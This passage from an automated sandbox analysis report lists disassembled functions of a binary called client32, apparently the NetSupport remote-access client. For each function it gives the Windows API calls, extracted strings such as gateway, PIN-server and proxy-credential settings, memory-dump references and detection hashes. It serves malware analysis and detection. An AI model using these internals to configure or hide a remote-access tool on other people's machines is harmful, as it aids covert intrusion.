                                                                                    • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                    • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                    • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                  • PostMessageA.USER32(0006040E,000006CF,00000007,00000000), ref: 11139C4F
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  • SetWindowTextA.USER32(0006040E,00000000), ref: 11139CF7
                                                                                  • IsWindowVisible.USER32(0006040E), ref: 11139DBC
                                                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11139DDC
                                                                                  • IsWindowVisible.USER32(0006040E), ref: 11139DEA
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 11139E18
                                                                                  • EnableWindow.USER32(0006040E,00000001), ref: 11139E27
                                                                                  • IsWindowVisible.USER32(0006040E), ref: 11139E78
                                                                                  • IsWindowVisible.USER32(0006040E), ref: 11139E85
                                                                                  • EnableWindow.USER32(0006040E,00000000), ref: 11139E99
                                                                                  • EnableWindow.USER32(0006040E,00000000), ref: 11139DFF
                                                                                    • Part of subcall function 11132120: ShowWindow.USER32(0006040E,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132144
                                                                                  • EnableWindow.USER32(0006040E,00000001), ref: 11139EAD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                  • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                  • API String ID: 3453649892-3803836183
                                                                                  • Opcode ID: 77f0fc716c5108730fe3721f30b933414b82ace8a427d74df6603177c94951ec
                                                                                  • Instruction ID: ba9ac0b981c1f0862d5fa69d940274f40709b6541bdede94fe31ed47de48390e
                                                                                  • Opcode Fuzzy Hash: 77f0fc716c5108730fe3721f30b933414b82ace8a427d74df6603177c94951ec
                                                                                  • Instruction Fuzzy Hash: 64C12B75A1127A9BEB11DBE0CD81FAAF766ABC032DF040438E9159B28CF775E444C791
                                                                                  Function 110305F5 Relevance: 31.6, APIs: 5, Strings: 13, Instructions: 149windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 11030645
                                                                                  • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11030797
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostwsprintf
                                                                                  • String ID: *ListenPort$Client$Default$Global\NSMWClassAdmin$NSMWClass$NSMWControl32$NSSWControl32$NSTWControl32$Ready$TCPIP$TraceIPC$UseIPC$_debug
                                                                                  • API String ID: 875889313-3431570279
                                                                                  • Opcode ID: 2b61c38f017bed57c92655f0d7e560a34b8dc01c16e3a6b7c0ac1e0e1303e311
                                                                                  • Instruction ID: 917d364d5c6b0b603fb0f9ba81c7ab37e2e4bb2b49ece13a51dcd12a3dfde8f6
                                                                                  • Opcode Fuzzy Hash: 2b61c38f017bed57c92655f0d7e560a34b8dc01c16e3a6b7c0ac1e0e1303e311
                                                                                  • Instruction Fuzzy Hash: C251FC74F42366AFE712CBE0CC55F69F7957B84B0CF200064E6156B6C9DAB0B540CB95
                                                                                  Function 110310D5 Relevance: 30.1, APIs: 9, Strings: 8, Instructions: 315COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 110310D9
                                                                                  • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                  • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                  • InterlockedExchange.KERNEL32(02648DF0,00001388), ref: 110313BA
                                                                                  • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorModeObject$ExchangeInfoInterlockedNativeStockSystem
                                                                                  • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                                  • API String ID: 1428277488-3745656997
                                                                                  • Opcode ID: 68ed8480d6958b2ac7d7fb7ebc491991a5e7665163c165e1b98fe1ba85b4c25f
                                                                                  • Instruction ID: bbabce5d96ec2c90806d5611ae465d21da0aa0097d7318abfc1e6149708f9681
                                                                                  • Opcode Fuzzy Hash: 68ed8480d6958b2ac7d7fb7ebc491991a5e7665163c165e1b98fe1ba85b4c25f
                                                                                  • Instruction Fuzzy Hash: 60C137B0E162759EDF02CBF48C847DDFAF4AB8830CF0445BAE855A7285EB715A80C752
                                                                                  Function 110310AC Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 249COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                  • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                  • InterlockedExchange.KERNEL32(02648DF0,00001388), ref: 110313BA
                                                                                  • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                  • _sprintf.LIBCMT ref: 11031401
                                                                                  • _setlocale.LIBCMT ref: 1103140B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorModeObject$ExchangeInterlockedStock_malloc_memset_setlocale_sprintfwsprintf
                                                                                  • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                                  • API String ID: 4242130455-3745656997
                                                                                  • Opcode ID: 3ae6bce2a60a0fdfd5c31868ef0703f6b2060c5edf3e3339330c26d0fdaec795
                                                                                  • Instruction ID: e9c6acc14f93b40a3e0eb8b8fbec85b26532d2932113fe6213d234842048e606
                                                                                  • Opcode Fuzzy Hash: 3ae6bce2a60a0fdfd5c31868ef0703f6b2060c5edf3e3339330c26d0fdaec795
                                                                                  • Instruction Fuzzy Hash: 9891F6B0E06365DEEF02CBF488847ADFFF0AB8830CF1445AAD45597285EB755A40CB52
                                                                                  Function 110287A0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 130librarysynchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110287F1
                                                                                    • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                  • wsprintfA.USER32 ref: 11028814
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028859
                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 1102886D
                                                                                  • wsprintfA.USER32 ref: 11028891
                                                                                  • CloseHandle.KERNEL32(?), ref: 110288A7
                                                                                  • CloseHandle.KERNEL32(?), ref: 110288B0
                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028911
                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028925
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                  • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                  • API String ID: 512045693-419896573
                                                                                  • Opcode ID: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                                  • Instruction ID: fa2db278f690afc2f691dfd055e17c1d40a227d38623a0fdca6da18cc7b7963a
                                                                                  • Opcode Fuzzy Hash: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                                  • Instruction Fuzzy Hash: 4F41B679E40228ABD714CF94DC89FE6B7A8EB45709F0081A5F95497284DAB0AD45CFA0
                                                                                  Function 6FA033A0 Relevance: 27.6, APIs: 2, Strings: 16, Instructions: 571COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wsprintf
                                                                                  • String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247
                                                                                  • API String ID: 2111968516-2157635994
                                                                                  • Opcode ID: ef74d2877e5902aa82a13beae3e67c4a3f2c51c3e8246414091ce5192f680592
                                                                                  • Instruction ID: 0fc63aa45d6289b6a78bf38bef8a2fda7982e9afc231de32180b84e3236b59fa
                                                                                  • Opcode Fuzzy Hash: ef74d2877e5902aa82a13beae3e67c4a3f2c51c3e8246414091ce5192f680592
                                                                                  • Instruction Fuzzy Hash: 2F22A2B2E00368AFDB20DE64DC81EEAB7B9BB4A304F0485D9E549A7180D6356FC5CF51
                                                                                  Function 110860E0 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 218libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(PCIINV.DLL,50D94AA1,02D273B0,02D273A0,?,00000000,1118368C,000000FF,?,11032002,02D273B0,00000000,?,?,?), ref: 11086115
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                    • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7736C3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                                  • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 1108613B
                                                                                  • GetProcAddress.KERNEL32(00000000,Cancel), ref: 1108614F
                                                                                  • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11086163
                                                                                  • wsprintfA.USER32 ref: 110861EB
                                                                                  • wsprintfA.USER32 ref: 11086202
                                                                                  • wsprintfA.USER32 ref: 11086219
                                                                                  • CloseHandle.KERNEL32(00000000,11085F40,00000001,00000000), ref: 1108636A
                                                                                    • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,7622F550,?,?,11086390,?,11032002,02D273B0,00000000,?,?,?), ref: 11085D68
                                                                                    • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,7622F550,?,?,11086390,?,11032002,02D273B0,00000000,?,?,?), ref: 11085D7B
                                                                                    • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,7622F550,?,?,11086390,?,11032002,02D273B0,00000000,?,?,?), ref: 11085D8E
                                                                                    • Part of subcall function 11085D50: FreeLibrary.KERNEL32(00000000,7622F550,?,?,11086390,?,11032002,02D273B0,00000000,?,?,?), ref: 11085DA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                  • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                  • API String ID: 4263811268-2492245516
                                                                                  • Opcode ID: 9add6b772f8b96242f208600117685c77274ddd20eb7f7d58a35d558fcdd73aa
                                                                                  • Instruction ID: cc6116ccc6b21cbbfdc815c98c7fdad09c9720580d605ccac26d10648bac74b6
                                                                                  • Opcode Fuzzy Hash: 9add6b772f8b96242f208600117685c77274ddd20eb7f7d58a35d558fcdd73aa
                                                                                  • Instruction Fuzzy Hash: 5471CDB4E44709ABEB10CF79DC51BDAFBE8EB48304F00456AF95AD7280EB75A500CB94
                                                                                  Function 11030B78 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 190synchronizationlibraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 11030CB3
                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 11030CCA
                                                                                  • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030D6C
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11030D82
                                                                                  • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                                  • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                                  • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                  • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                  • API String ID: 2061479752-1320826866
                                                                                  • Opcode ID: 1d9f851f1a35bbda09da46747162988cfd9d26cfc3fdf28e12350a95bf7e0c46
                                                                                  • Instruction ID: 041cc1499d836288ec3ce923e3d2bdfde1aeba2e10a7f52041b4b34688633552
                                                                                  • Opcode Fuzzy Hash: 1d9f851f1a35bbda09da46747162988cfd9d26cfc3fdf28e12350a95bf7e0c46
                                                                                  • Instruction Fuzzy Hash: 64610974E1631A9FEB15DBB08D89B9DF7B4AF4070DF0040A8E915A72C5EF74AA40CB51
                                                                                  Function 11134D90 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 101windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 11146010: _memset.LIBCMT ref: 11146055
                                                                                    • Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                    • Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                    • Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                    • Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                    • Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                  • AdjustWindowRectEx.USER32(11142328,00CE0000,00000001,00000001), ref: 11134DD7
                                                                                  • LoadMenuA.USER32(00000000,000003EC), ref: 11134DE8
                                                                                  • GetSystemMetrics.USER32(00000021), ref: 11134DF9
                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 11134E01
                                                                                  • GetSystemMetrics.USER32(00000004), ref: 11134E07
                                                                                  • GetDC.USER32(00000000), ref: 11134E13
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 11134E1E
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 11134E2A
                                                                                  • CreateWindowExA.USER32(00000001,NSMWClass,02D119D8,00CE0000,80000000,80000000,11142328,?,00000000,?,11000000,00000000), ref: 11134E7F
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,110F8239,00000001,11142328,_debug), ref: 11134E87
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
